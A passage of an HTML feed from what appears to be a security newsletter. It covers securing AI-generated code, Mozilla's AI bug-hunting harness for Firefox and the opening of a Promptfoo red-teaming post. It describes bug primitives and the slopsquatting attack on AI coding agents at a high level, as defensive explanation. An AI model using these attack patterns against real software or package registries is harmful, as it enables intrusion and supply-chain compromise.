vulnerabilities&#8221; to your rules. Now every code generation request gets security guardrails on the way in and a vulnerability scan on the way out. It won&#8217;t catch everything. Logic flaws and context-dependent vulnerabilities still need human eyes. But the commodity-level bugs, the SQLi, the XSS, the hardcoded secrets that Semgrep&#8217;s 5,000+ rules cover, those stop shipping silently.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cZMN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cZMN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 424w, https://substackcdn.com/image/fetch/$s_!cZMN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 848w, https://substackcdn.com/image/fetch/$s_!cZMN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 1272w, https://substackcdn.com/image/fetch/$s_!cZMN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cZMN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png" width="889" height="620" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:620,&quot;width&quot;:889,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:49406,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cZMN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 424w, https://substackcdn.com/image/fetch/$s_!cZMN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 848w, https://substackcdn.com/image/fetch/$s_!cZMN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 1272w, https://substackcdn.com/image/fetch/$s_!cZMN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd0d383e-e55c-4847-91e4-fd88629f156b_889x620.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is vibe coding safe for production applications?</h3><p>Vibe coding can produce production-ready code, but not by default. AI coding tools optimize for working software, not secure software, which means authentication gaps, hardcoded secrets, and unvalidated inputs ship unless you add explicit checks. The three tool layers covered here, secret scanning with Gitleaks and TruffleHog, supply chain verification with Socket, and static analysis with Semgrep, close the most common gaps without slowing development.</p><h3>What is slopsquatting and how does it affect AI-generated code?</h3><p>Slopsquatting is a supply chain attack where adversaries register package names that AI coding tools consistently hallucinate. LLMs fabricate plausible-sounding dependency names at a high rate, and many of those hallucinated names repeat predictably across prompts, making them easy targets for attackers. They register the hallucinated name on PyPI or npm, load it with malicious code, and wait for developers or AI agents to install it. Tools like slopcheck catch hallucinated packages before install by checking them against live registries, and Socket adds deeper behavioral analysis for packages that exist but act suspicious.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!u-rb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!u-rb!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 424w, https://substackcdn.com/image/fetch/$s_!u-rb!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 848w, https://substackcdn.com/image/fetch/$s_!u-rb!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 1272w, https://substackcdn.com/image/fetch/$s_!u-rb!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!u-rb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png" width="1255" height="1043" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1043,&quot;width&quot;:1255,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:134081,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!u-rb!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 424w, https://substackcdn.com/image/fetch/$s_!u-rb!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 848w, https://substackcdn.com/image/fetch/$s_!u-rb!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 1272w, https://substackcdn.com/image/fetch/$s_!u-rb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6d1e8b3f-ff7d-4fe1-84b3-b7ecf019e224_1255x1043.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>How do Cursor security rules files improve AI-generated code security?</h3><p>Security rules files are instruction sets stored in your project&#8217;s <code>.cursor/rules/</code> directory that the AI reads before generating code. They enforce standards like parameterized SQL queries, input sanitization, authentication middleware requirements, and bans on unsafe functions like <code>eval()</code>. The rules persist across every prompt, so you set them once and they apply to all generated code. Open-source rule collections are available on GitHub, and the Cloud Security Alliance has published a framework for writing security-focused rules.</p><h3>Can Semgrep scan code while the AI is generating it?</h3><p>Yes. Semgrep&#8217;s MCP server integrates directly into Cursor, VS Code, Windsurf, and other MCP-compatible editors. When the AI generates code, the IDE can call Semgrep to scan for vulnerabilities in real time. Semgrep&#8217;s Cursor Hooks feature automates this further: a scan fires automatically when the AI agent completes its loop, and the agent is prompted to fix any findings before the code is accepted. This makes security scanning deterministic rather than dependent on developers remembering to run it.</p><h3>What are the most common security vulnerabilities in AI-generated code?</h3><p>The most common are missing input validation leading to SQL injection, XSS, and command injection. Broken authentication and access control rank second, where the AI builds features but skips the identity checks that should gate them. Insecure defaults round out the list: weak hashing algorithms like MD5 for passwords, unsafe deserialization using Python&#8217;s <code>pickle</code> on untrusted data, and verbose error messages that expose internal paths and framework details to attackers.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[Mozilla Mythos Harness: AI Bug Hunting Without The Slop]]></title><description><![CDATA[Inside the agentic loop Mozilla wrapped around Mythos to surface 271 Firefox bugs, and why the harness mattered more than the model.]]></description><link>https://www.toxsec.com/p/mozilla-mythos-harness-ai-bug-hunting</link><guid isPermaLink="false">https://www.toxsec.com/p/mozilla-mythos-harness-ai-bug-hunting</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Tue, 12 May 2026 13:30:57 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/197047050/80d0d6f5dd666d10aeb211ef91b608a4.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> Mozilla wrapped Claude Mythos Preview in an agentic harness with one win condition: trip the sanitizer or keep working. The result was 271 Firefox bugs in one release, fewer than 15 false positives, and a defense-in-depth lesson nobody talks about. The model got the headlines. The harness did the work.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What&#8217;s An Agentic Vulnerability Harness?</h2><p>In agentic security work, a harness is the scaffold around the model. Tooling, prompts, build environment, retry loop, success signal, dedup, the lot. The model is the worker. The harness is the factory floor.</p><p>Mozilla&#8217;s earlier collaboration with Anthropic ran Claude Opus 4.6 against Firefox 148. That cycle pulled 22 security-sensitive bugs. Then they took the same harness, dropped in Anthropic&#8217;s cyber-tuned Claude Mythos Preview, and aimed it at Firefox 150. Same factory. Stronger worker. The output went from 22 to 271 bugs.</p><p>That delta is where the lesson lives. Model upgrades obviously help. But Mozilla&#8217;s harness was rebuilt across months of iteration with Firefox engineers fielding the incoming bugs, and you don&#8217;t replicate that on a Saturday afternoon. The Mythos preview is restricted access through <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">Project Glasswing</a>. The harness is a <a href="https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/">published pattern</a>.</p><h2>Inside Mozilla&#8217;s Mythos Harness: Crash Or No Crash</h2><p>Here&#8217;s how the loop works. The harness gives the model a slice of Firefox source, a target file or area to focus on, instructions on what to hunt for, and a build environment with one critical piece: a sanitizer build of Firefox compiled with <strong>AddressSanitizer</strong>. ASan is the runtime memory-error detector that screams loudly when you trigger a use-after-free, a heap overflow, or any other classic memory corruption primitive.</p><p>The model proposes a bug hypothesis. It writes a proof-of-concept designed to trip the sanitizer. It runs the PoC against the sanitizer build. If ASan crashes, the bug is real. If it doesn&#8217;t, the agent keeps iterating until it does or until the harness gives up.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;yaml&quot;,&quot;nodeId&quot;:&quot;f2b8f2b2-3cb3-44d5-a068-90f9fff0dfca&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-yaml">loop:
    hypothesize_bug(target_source)
    write_poc()
    run_against_sanitizer_build()
    if asan_crash:
        emit_report(crash_log, repro)
        grade_with_secondary_model()
        break
    refine_or_continue()</code></pre></div><p>Brian Grinstead, a Mozilla Distinguished Engineer, <a href="https://techcrunch.com/2026/05/07/how-anthropics-mythos-has-rewritten-firefoxs-approach-to-cybersecurity/">summed the operational shape to TechCrunch</a>: &#8220;if you make it crash you win&#8221;. That&#8217;s the entire verification game. A second model grades resulting reports before the engineering queue ever sees them, kicking out anything the first model thought was a hit but couldn&#8217;t actually validate. Humans take over from there for triage and patching.</p><p>The bugs the harness surfaced run the gamut. A race condition over IPC that lets a compromised content process tamper with IndexedDB refcounts and trigger a use-after-free (Bug 2021894). A raw NaN smuggled across an IPC boundary masquerading as a tagged JavaScript object pointer, giving the parent process a fake-object primitive (Bug 2022034). A buffer over-read during HTTPS RR and ECH parsing, triggered by simulating a malicious DNS server through glibc function interception (Bug 2023958). Plus a 15-year-old HTML legend element bug and a 20-year-old XSLT reentrant key() call. Each is a sandbox escape primitive or memory corruption bug that would normally burn months of elite human researcher time. The harness surfaced them in days.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/mozilla-mythos-harness-ai-bug-hunting?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/mozilla-mythos-harness-ai-bug-hunting?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>Why The Crash Signal Killed AI Bug Hunting Slop</h2><p>AI-generated bug reports were a running joke in open source maintainer circles a few months ago. LLM hits codebase, dumps a hundred plausible-looking findings, every one needs a human to verify, and ninety-something percent are wrong. Mozilla&#8217;s own writeup describes earlier AI security work as producing &#8220;unwanted slop.&#8221; The cost asymmetry was brutal. Cheap for the AI, expensive for the maintainer.</p><p>Mozilla&#8217;s earlier static-analysis experiments with GPT-4 and Claude Sonnet 3.5 hit that wall. They produced too many false positives to be practical. So they binned static analysis and built the agentic harness instead. The shift is subtle but everything.</p><p>Static analysis says: this looks vulnerable. Human triage required.</p><p>Agentic harness with sanitizer verification says: this is vulnerable, here&#8217;s the PoC, ASan caught the crash. No human required to dispute reality.</p><p><strong>Memory corruption is the perfect domain for that move because the success signal is binary.</strong> ASan tripped or it didn&#8217;t. There is no maybe. Mozilla counted fewer than 15 false positives across the entire 271-bug run, and they updated the harness each time one slipped through.</p><p>The lesson for everyone else is that AI bug hunting works the moment you can wire the agent to a verifier that doesn&#8217;t ask the model are you sure. A fuzzer crash. A unit test that passes. A property checker that proves invariance. Anything deterministic. Without that signal, you&#8217;re back to triage hell, which is the same hell every <a href="https://www.toxsec.com/p/garak-llm-vulnerability-scanner">LLM vulnerability scanner</a> lives in when it doesn&#8217;t ship its own ground truth.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>What The Harness Couldn&#8217;t Bypass</h2><p>Here&#8217;s the part the headlines skipped. The harness ran into a wall trying to escape Firefox&#8217;s sandbox via prototype pollution in the privileged parent process. The model attempted that path repeatedly. It got nowhere. Mozilla had previously frozen those prototypes by default as a defense-in-depth measure, and that single architectural decision blocked every attempt the agent made.</p><p>That&#8217;s the based take buried under the 271 number. The harness is good. It&#8217;s also bounded by the security architecture of the target. The bugs Mythos found are bugs an elite human could have found. The bugs it couldn&#8217;t find were already eliminated by Mozilla&#8217;s prior hardening. <strong>Your codebase will perform exactly as well as your prior security work let it.</strong></p><p>Which brings us to the &#8220;anyone can do this today&#8221; framing Mozilla offered at the end of their writeup. Technically true. Operationally, optimistic.</p><p>Mozilla had Firefox&#8217;s full source. A pre-built sanitizer toolchain. Years of bug lifecycle tooling. A second model already wired into the verification pipeline. Over 100 contributors writing and reviewing patches. Months of harness iteration alongside the Firefox team. And, eventually, frontier-model access through Project Glasswing.</p><p>A small vendor pulling Mythos through an API later this year and pointing it at their codebase will not get the same numbers. The model is the same. The harness around it is the part you have to build. Mozilla published the pattern. The pipeline still costs what a pipeline costs. Firefox shipped 423 bug fixes in April 2026, compared to 31 a year earlier, and absorbing that volume takes operational muscle most teams don&#8217;t have lying around.</p><p>The 271 number is the headline. <strong>The harness is the artifact.</strong> Anyone shopping for AI bug hunting capability should price the second one before they get excited about the first. Your AI-generated bug reports are only as useful as the verifier behind them, and the same goes for AI-generated code, where the <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">verification problem flips into supply chain attacks</a> and slopsquatting at pip-install time. Wrap the same agentic loop around offense instead of defense, point it at <a href="https://www.toxsec.com/p/fck-your-guardrails">live prompt injection chains</a>, and the success signal flips from &#8220;ASan crashed&#8221; to &#8220;the guardrail broke.&#8221; Same shape. Different game.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops. Upgrade now.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is the Mozilla Mythos harness?</h3><p>The Mozilla Mythos harness is the agentic scaffold Mozilla built around Anthropic&#8217;s Claude Mythos Preview to find security bugs in Firefox source code. It feeds the model target source, runs against a sanitizer build of Firefox, uses an AddressSanitizer crash as the deterministic success signal, and runs a retry loop until the agent produces a verified proof-of-concept. A second model grades reports before engineers see them.</p><h3>How many Firefox vulnerabilities did Claude Mythos find?</h3><p>Mozilla credits Claude Mythos Preview with surfacing 271 vulnerabilities fixed in Firefox 150, plus additional fixes shipped in versions 149.0.2, 150.0.1, and 150.0.2. Of the 271 bugs, 180 were rated sec-high, 80 sec-moderate, and 11 sec-low. Several were sandbox escape primitives. Mozilla reports fewer than 15 false positives across the entire run. Total Firefox security fixes in April 2026 hit 423.</p><h3>Can other projects use the same AI bug hunting harness?</h3><p>Mozilla published the pattern. The implementation is yours to build. The harness shape is reusable: target source, deterministic success signal (sanitizer crash, fuzzer hit, test failure), retry loop, second model grading reports. The build is project-specific. You need the codebase, the sanitizer toolchain, the bug lifecycle tooling, and the engineers to absorb the patch volume. Pattern is free. Pipeline is the work.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[Promptfoo Red Teaming: DAST for Your LLM Pipeline]]></title><description><![CDATA[YAML config, one command, 50+ attack plugins. OpenAI just bought the company. Still MIT licensed.]]></description><link>https://www.toxsec.com/p/promptfoo-red-teaming</link><guid isPermaLink="false">https://www.toxsec.com/p/promptfoo-red-teaming</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sat, 09 May 2026 13:31:22 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ZbyR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZbyR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZbyR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7434020,&quot;alt&quot;:&quot;Promptfoo red teaming LLM vulnerability scanner tutorial showing YAML config attack plugins strategies and web UI results for AI security testing.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193714884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F13d24168-9e36-49e1-ae4f-efeb38afe030_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Promptfoo red teaming LLM vulnerability scanner tutorial showing YAML config attack plugins strategies and web UI results for AI security testing." title="Promptfoo red teaming LLM vulnerability scanner tutorial showing YAML config attack plugins strategies and web UI results for AI security testing." srcset="https://substackcdn.com/image/fetch/$s_!ZbyR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 